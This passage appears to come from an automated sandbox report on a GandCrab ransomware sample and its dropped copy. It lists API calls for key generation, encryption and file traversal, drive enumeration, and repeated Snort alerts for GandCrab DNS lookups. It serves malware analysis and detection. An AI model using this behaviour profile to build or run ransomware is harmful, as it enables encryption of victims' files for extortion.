Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	0_2_0F1D5880
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	0_2_0F1D62B0
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	0_2_0F1D82A0
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	0_2_0F1D5210
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F1D6530
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	0_2_0F1D5670
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	9_2_0FBC4950
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	9_2_0FBC62B0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	9_2_0FBC82A0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	9_2_0FBC5880
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	9_2_0FBC6530
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	9_2_0FBC5210
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	9_2_0FBC5670
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	9_2_0FBC8150
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC4950 Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,	25_2_0FBC4950
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC62B0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,	25_2_0FBC62B0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC82A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	25_2_0FBC82A0
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC5880 VirtualAlloc,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,lstrlenW,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenA,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,	25_2_0FBC5880
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6530 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	25_2_0FBC6530
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC5210 lstrlenA,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,	25_2_0FBC5210
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC5670 VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,lstrlenW,_memset,lstrlenA,lstrlenW,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	25_2_0FBC5670
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC8150 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	25_2_0FBC8150

Source: O8ZHhytWhn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: O8ZHhytWhn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F1D6A40
Source: C:\Users\user\Desktop\O8ZHhytWhn.exe	Code function: 0_2_0F1D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F1D6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	9_2_0FBC6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 9_2_0FBC6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	9_2_0FBC6A40
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	25_2_0FBC6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\wjaoab.exe	Code function: 25_2_0FBC6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	25_2_0FBC6A40

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:50507 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:50508 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:50509 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:50510 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:61180 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:61181 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:61182 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:61183 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:53338 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:53339 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:53340 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:53341 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:51009 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:51010 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:51011 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:51012 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58285 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58286 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58287 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58288 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50026 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50027 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50028 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50029 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:62681 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:62682 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:62683 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:62684 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:52106 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:52107 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:52108 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:52109 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51141 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51142 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51143 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51144 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:58786 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:58787 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:58788 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:58789 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58748 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58749 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58750 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:58751 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62435 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62436 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62437 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62438 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:64080 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:64081 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:64082 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:64083 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50233 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50234 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50235 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:50236 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51438 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51439 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51440 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:51441 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59055 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59056 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59057 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59058 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:63189 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:63190 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:63191 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:63192 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:53639 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:53640 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:53641 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:53642 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:54194 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:54195 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:54196 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:54197 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62020 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62021 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62022 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62023 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:60839 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:60840 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:60841 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:60842 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:55833 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:55834 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:55835 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:55836 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:56773 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:56774 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:56775 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:56776 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59548 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59549 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59550 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:59551 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:61174 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:61175 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:61176 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:61177 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62910 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62911 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62912 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:62913 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59848 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59849 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59850 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59851 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:63293 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:63294 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:63295 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.7:63296 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.7:59114 -> 8.8.8.8:53
